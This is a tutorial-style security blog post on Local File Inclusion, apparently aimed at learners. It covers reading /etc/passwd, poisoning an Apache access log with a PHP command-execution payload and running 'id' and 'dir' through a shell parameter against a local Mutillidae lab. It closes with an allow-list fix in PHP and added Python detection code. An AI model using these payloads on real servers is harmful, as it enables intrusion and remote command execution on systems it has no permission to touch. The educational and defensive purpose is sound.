LFI is short for "Local File Inclusion".
Hello all, this is my second blog, on the topic of LFI (Local File Inclusion). (The first one was on CSRF. You can find it here:-)
What is it?
How to exploit it?
How can it be dangerous?
How to prevent it?
So, let's get started.
What is LFI?
LFI is a vulnerability in which an attacker makes the application include a local file from the server's file system. Sounds simple.
Okay, let's look at an example to understand it better.
Suppose you are at http://januapp/demo/files.php?getfile=delete.txt, and the contents of the file are "I am for deleting".
Now, to test whether LFI exists, change the file name from delete.txt to delet.txt and watch how the web app behaves. Does an error occur, like "failed to load the inclusion"? Something like this:
Note:- You will not always see this error. Sometimes developers hide their errors.
Now, how do I exploit it?
To exploit it, we change the file name to one that exists on the server, like the /etc/passwd file on a Linux system, or C:\WINDOWS\System32\drivers\etc\hosts on Windows. This confirms that the attacker can read system files.
Like this:-
So this confirms that I am able to read files from the server, so you have found the vulnerability.
Note:- Sometimes you need to go up the directories using a Directory Traversal attack. Google it.
So, can you only read the passwd file? Is it possible to make LFI more dangerous?
Yes, it is. We can upload a shell through LFI, but only if we can read the access log file. (If you cannot read the file, the attack will not work.)
But why the log file? Because the log file stores all the requested URLs.
Now, on an Apache server the log file is at this path:-
/var/log/apache2/access.log
But remember that the file name and path differ between servers. For example, on Windows:
C:\xampp\apache\logs\access.log
So when I include this file, this is what I get; see the image below.
Have you seen the alert box from the execution of the JavaScript? It means that this file contains a URL which has some JavaScript code in it, so when I open this log file through the include, the alert box is executed.
So, similarly, we will issue a URL which has some PHP code in it.
Something like this:- http://vulnerabledomain.com/<?php system($_GET['cmd'])?>
Note:- We will use cURL, as the browser will URL-encode the payload, which breaks the attack. So let's understand it.
1. You need to download cURL.
2. Then use cURL to send the malicious URL, which will be stored in the access.log file.
3. You can view the file by adding the parameter which is provided in the URL, i.e. "cmd".
Let's see the screenshots ;)
In the first screenshot you can see the PHP payload with passthru() and with the test123 parameter.
And now we need to add the test123 parameter to the URL. ;)
http://127.0.0.1/index.php?page=C:\xampp\apache\logs\access.log&test123=
Now let's confirm that we have successfully uploaded our shell.
Our 1st Exploit:-
http://127.0.0.1/index.php?page=C:\xampp\apache\logs\access.log&test123=id
Result:
Any doubt? Okay, let's see the next one.
Second Exploit:-
http://127.0.0.1/mutillidae/index.php?page=C:\xampp\apache\logs\access.log&test123=dir
Result:-
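From the defender's side, the log-poisoning chain above leaves traces in the very access.log it abuses. As an added example (not from the post), here is a small Python scanner run over constructed Apache combined-format log lines that flags the three indicators this section depends on: traversal in a file parameter, an absolute or log-file path in it, and a PHP open tag planted in the request line. The log lines, parameter names and paths are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access.log lines (Apache "combined" format); not taken from the post.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2023:10:00:01 +0000] "GET /demo/files.php?getfile=delete.txt HTTP/1.1" 200 18 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Oct/2023:10:00:05 +0000] "GET /demo/files.php?getfile=../../../../etc/passwd HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Oct/2023:10:00:09 +0000] "GET /<?php system($_GET['cmd'])?> HTTP/1.1" 404 209 "-" "curl/7.88.1"
127.0.0.1 - - [10/Oct/2023:10:00:12 +0000] "GET /index.php?page=C:\\xampp\\apache\\logs\\access.log&test123=id HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Oct/2023:10:00:15 +0000] "GET /demo/files.php?getfile=undelete.txt HTTP/1.1" 200 20 "-" "Mozilla/5.0"
"""

# Request line inside the quotes: method, target, protocol. Non-greedy so a
# target containing spaces (a planted "<?php ..." payload) is still captured.
REQUEST_RE = re.compile(r'"([A-Z]+) (.*?) (HTTP/[\d.]+)"')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                       # ../ or ..\
ABS_PATH_RE = re.compile(r'^(?:[/\\]|[A-Za-z]:[/\\])')         # /... or C:\...
LOG_FILE_RE = re.compile(r'(?:access|error)\.log$|/etc/passwd$', re.IGNORECASE)

def classify_request(raw_target):
    """Return the set of indicator names found in one request target."""
    target = unquote(raw_target)
    reasons = set()
    if '<?php' in target or '<?=' in target:
        reasons.add('php_tag_in_url')      # attempt to plant PHP code in the log
    query = urlsplit(target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if TRAVERSAL_RE.search(value):
            reasons.add('directory_traversal')
        if ABS_PATH_RE.match(value):
            reasons.add('absolute_path')
        if LOG_FILE_RE.search(value):
            reasons.add('sensitive_file')  # log file or passwd named as the include target
    return reasons

def scan_access_log(text):
    """Return [(line_no, sorted_reasons)] for every line with at least one indicator."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m.group(2))
        if reasons:
            findings.append((line_no, sorted(reasons)))
    return findings
```

Run against SAMPLE_LOG, lines 2, 3 and 4 are reported and the two legitimate delete.txt/undelete.txt requests are not.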
Okay, so far we have only read about how LFI is dangerous. Now,
What is the way to protect against it?
The best and very simple protection is making an array which contains the allowed files.
For example:-
Here is the code I have written for it.

    <?php
    // Allow-list of the only files that may be included.
    $v1 = array('delete.txt', 'undelete.txt');
    $filename = @$_GET['getfile'];
    if (isset($filename))
    {
        // Exact (strict) match against the allow-list; "../" or any other
        // path can never match an entry, so it falls through to index.php.
        if (in_array($filename, $v1, true))
        {
            include($filename);
        }
        else
        {
            include("index.php");
        }
    }
    ?>

So, here I provide an array which contains all the allowed files, i.e. delete.txt and undelete.txt. Then I check whether the file is allowed or not through in_array(). If the file is not allowed then it will include the index.php file, hence it is protected from the LFI attack. Makes sense?
Let's look at a short video which shows the result of the code.
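As an added example (not the post's code), the same allow-list check re-implemented in Python and run against the inputs the post walks through: the two allowed files, the delet.txt typo probe, the traversal and passwd paths, and the XAMPP access.log path used for log poisoning. BASE_DIR and the probe table are assumptions; the one addition over the post's check is that the included path is built from a fixed directory rather than from the raw parameter.

```python
from pathlib import Path

# Assumed layout (not from the post): the includable files live under this directory.
BASE_DIR = Path("/var/www/demo")
# Same allow-list as the post's $v1 array; the fallback is the post's index.php.
ALLOWED_FILES = frozenset({"delete.txt", "undelete.txt"})
FALLBACK = BASE_DIR / "index.php"

def resolve_include(getfile):
    """Map the getfile parameter to the path that will actually be included.

    Mirrors the post's in_array() check (exact string match against the list)
    and then builds the path from BASE_DIR, so user input never reaches the
    include as a path of its own."""
    if getfile is None or getfile not in ALLOWED_FILES:
        return FALLBACK
    return BASE_DIR / getfile

# Constructed probes: the inputs the post discusses and the path each must resolve to.
PROBES = {
    "delete.txt": BASE_DIR / "delete.txt",
    "undelete.txt": BASE_DIR / "undelete.txt",
    "delet.txt": FALLBACK,                          # typo probe from the post
    "../../../../etc/passwd": FALLBACK,             # directory traversal
    "/etc/passwd": FALLBACK,                        # absolute path
    r"C:\xampp\apache\logs\access.log": FALLBACK,   # log-poisoning target
    None: FALLBACK,                                 # parameter absent
}

def check_probes():
    """Return True when every probe resolves to its expected path."""
    return all(resolve_include(p) == expected for p, expected in PROBES.items())
```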
That's all for LFI, hope you really enjoyed reading it. On Twitter: @agrawalsmart7
Thank you very much. Like and comment if you want. And stay tuned for my next blog ;).
Thanks for explaining so well... :)
Thanks mate, appreciable.
Good writeup!!
Thanks mate ;)